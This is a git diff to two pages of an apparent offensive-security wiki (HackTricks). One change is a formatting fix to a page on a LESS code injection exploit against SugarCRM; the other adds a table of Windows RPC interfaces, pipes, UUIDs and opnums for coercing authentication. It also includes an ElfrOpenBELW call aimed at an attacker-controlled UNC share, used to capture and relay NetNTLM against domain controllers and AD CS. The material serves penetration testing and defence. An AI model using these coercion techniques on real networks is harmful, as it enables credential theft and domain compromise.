diff --git a/src/pentesting-web/xs-search/css-injection/less-code-injection.md b/src/pentesting-web/xs-search/css-injection/less-code-injection.md index b9d599deb30..6d338df2b68 100644 --- a/src/pentesting-web/xs-search/css-injection/less-code-injection.md +++ b/src/pentesting-web/xs-search/css-injection/less-code-injection.md @@ -1,4 +1,6 @@ -## LESS Code Injection leading to SSRF & Local File Read +# LESS Code Injection leading to SSRF & Local File Read + +{{#include ../../../banners/hacktricks-training.md}} LESS is a popular CSS pre-processor that adds variables, mixins, functions and the powerful `@import` directive. During compilation the LESS engine will **fetch the resources referenced in `@import`** statements and embed ("inline") their contents into the resulting CSS when the `(inline)` option is used. @@ -59,4 +61,5 @@ curl -sk "${TARGET}rest/v10/css/preview?baseUrl=1&lm=${INJ}" | \ * [SugarCRM ≤ 14.0.0 (css/preview) LESS Code Injection Vulnerability](https://karmainsecurity.com/KIS-2025-04) * [SugarCRM Security Advisory SA-2024-059](https://support.sugarcrm.com/resources/security/sugarcrm-sa-2024-059/) -* [CVE-2024-58258](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-58258) \ No newline at end of file +* [CVE-2024-58258](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-58258) +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md b/src/windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md index f00fdfbc6ee..2323634396e 100644 --- a/src/windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md +++ b/src/windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md @@ -36,7 +36,7 @@ rpcdump.py DOMAIN/USER:PASSWORD@SERVER.DOMAIN.COM | grep MS-RPRN ### Ask the service to authenticate against an arbitrary host -You can compile[ **SpoolSample from here**](https://github.com/NotMedic/NetNTLMtoSilverTicket)**.** +You can compile [SpoolSample from here](https://github.com/NotMedic/NetNTLMtoSilverTicket). ```bash SpoolSample.exe @@ -53,12 +53,48 @@ printerbug.py 'domain/username:password'@ If an attacker has already compromised a computer with [Unconstrained Delegation](unconstrained-delegation.md), the attacker could **make the printer authenticate against this computer**. Due to the unconstrained delegation, the **TGT** of the **computer account of the printer** will be **saved in** the **memory** of the computer with unconstrained delegation. As the attacker has already compromised this host, he will be able to **retrieve this ticket** and abuse it ([Pass the Ticket](pass-the-ticket.md)). -## RCP Force authentication - - -{{#ref}} -https://github.com/p0dalirius/Coercer -{{#endref}} +## RPC Force authentication + +[Coercer](https://github.com/p0dalirius/Coercer) + +### RPC UNC-path coercion matrix (interfaces/opnums that trigger outbound auth) +- MS-RPRN (Print System Remote Protocol) + - Pipe: \\PIPE\\spoolss + - IF UUID: 12345678-1234-abcd-ef00-0123456789ab + - Opnums: 62 RpcRemoteFindFirstPrinterChangeNotification; 65 RpcRemoteFindFirstPrinterChangeNotificationEx + - Tools: PrinterBug / PrintNightmare-family +- MS-PAR (Print System Asynchronous Remote) + - Pipe: \\PIPE\\spoolss + - IF UUID: 76f03f96-cdfd-44fc-a22c-64950a001209 + - Opnum: 0 RpcAsyncOpenPrinter +- MS-EFSR (Encrypting File System Remote Protocol) + - Pipes: \\PIPE\\efsrpc (also via \\PIPE\\lsarpc, \\PIPE\\samr, \\PIPE\\lsass, \\PIPE\\netlogon) + - IF UUIDs: c681d488-d850-11d0-8c52-00c04fd90f7e ; df1941c5-fe89-4e79-bf10-463657acf44d + - Opnums commonly abused: 0, 4, 5, 6, 7, 12, 13, 15, 16 + - Tool: PetitPotam +- MS-DFSNM (DFS Namespace Management) + - Pipe: \\PIPE\\netdfs + - IF UUID: 4fc742e0-4a10-11cf-8273-00aa004ae673 + - Opnums: 12 NetrDfsAddStdRoot; 13 NetrDfsRemoveStdRoot + - Tool: DFSCoerce +- MS-FSRVP (File Server Remote VSS) + - Pipe: \\PIPE\\FssagentRpc + - IF UUID: a8e0653c-2744-4389-a61d-7373df8b2292 + - Opnums: 8 IsPathSupported; 9 IsPathShadowCopied + - Tool: ShadowCoerce +- MS-EVEN (EventLog Remoting) + - Pipe: \\PIPE\\even + - IF UUID: 82273fdc-e32a-18c3-3f78-827929dc23ea + - Opnum: 9 ElfrOpenBELW + - Tool: CheeseOunce + +Note: These methods accept parameters that can carry a UNC path (e.g., `\\attacker\share`). When processed, Windows will authenticate (machine/user context) to that UNC, enabling NetNTLM capture or relay. + +### MS-EVEN: ElfrOpenBELW (opnum 9) coercion +- Interface: MS-EVEN over \\PIPE\\even (IF UUID 82273fdc-e32a-18c3-3f78-827929dc23ea) +- Call signature: ElfrOpenBELW(UNCServerName, BackupFileName="\\\\attacker\\share\\backup.evt", MajorVersion=1, MinorVersion=1, LogHandle) +- Effect: the target attempts to open the supplied backup log path and authenticates to the attacker-controlled UNC. +- Practical use: coerce Tier 0 assets (DC/RODC/Citrix/etc.) to emit NetNTLM, then relay to AD CS endpoints (ESC8/ESC11 scenarios) or other privileged services. ## PrivExchange @@ -137,4 +173,13 @@ If you can perform a MitM attack to a computer and inject HTML in a page he will If you can capture [NTLMv1 challenges read here how to crack them](../ntlm/index.html#ntlmv1-attack).\ _Remember that in order to crack NTLMv1 you need to set Responder challenge to "1122334455667788"_ -{{#include ../../banners/hacktricks-training.md}} +## References +- [Unit 42 – Authentication Coercion Keeps Evolving](https://unit42.paloaltonetworks.com/authentication-coercion/) +- [Microsoft – MS-EVEN: EventLog Remoting Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-even/55b13664-f739-4e4e-bd8d-04eeda59d09f) +- [Microsoft – MS-EVEN: ElfrOpenBELW (Opnum 9)](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-even/4db1601c-7bc2-4d5c-8375-c58a6f8fc7e1) +- [p0dalirius – windows-coerced-authentication-methods](https://github.com/p0dalirius/windows-coerced-authentication-methods) +- [PetitPotam (MS-EFSR)](https://github.com/topotam/PetitPotam) +- [DFSCoerce (MS-DFSNM)](https://github.com/Wh04m1001/DFSCoerce) +- [ShadowCoerce (MS-FSRVP)](https://github.com/ShutdownRepo/ShadowCoerce) + +{{#include ../../banners/hacktricks-training.md}} \ No newline at end of file